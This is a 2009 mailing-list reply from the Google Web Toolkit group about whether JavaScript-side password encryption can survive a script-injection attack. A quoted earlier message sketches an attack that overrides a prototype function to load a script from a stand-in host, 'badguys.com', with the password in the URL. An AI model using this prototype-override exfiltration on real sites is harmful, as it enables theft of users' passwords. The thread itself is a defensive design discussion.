First off, good luck trying to disassemble the GWT compiled code - it's hard to read even when you know what the original Java code is doing.
Nextly, I don't think I understand the problem you are presenting - it seems to me that if you have a script-injection exploit in your code, there is no way you can code it to protect the user, since the attacking code can always modify the original code in whatever way is necessary to send the password to the attacker. So whether or not you implement the algorithm in Javascript or not is irrelevant. An algorithm is a step-by-step process, independent of the language used to express it. Security is a property of the algorithm/protocol, not the language. Exactly how do you "block" the get & set functions? Also, it's not like those functions are standard, so I'm guessing their your equivalent to the more common foo & bar. On Tue, May 19, 2009 at 6:48 PM, Alyxandor < [email protected]> wrote: > > You can't attack the post-RSA password field, but if there's any point > along the way that the password is passed inside javascript, it might > be possible for a script-injection attacker to overwrite your > functions / add getter functions to prototypes and post your password > using something like rsa.prototype.set()=function(pass){addHack > ( '<script > src="badguys.com?x='+pass+'/<http://badguys.com?x=%27+pass+%27/>>');...} > Or such. Of course, > you sound like a smart guy who would already override such functions > to prevent an attack, but not everybody thinks to manually block get() > and set(), so having plain-script authentication would let badguys.com > know if it's worth trying or not... > > > --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "Google Web Toolkit" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/Google-Web-Toolkit?hl=en -~----------~----~----~----~------~----~------~--~---
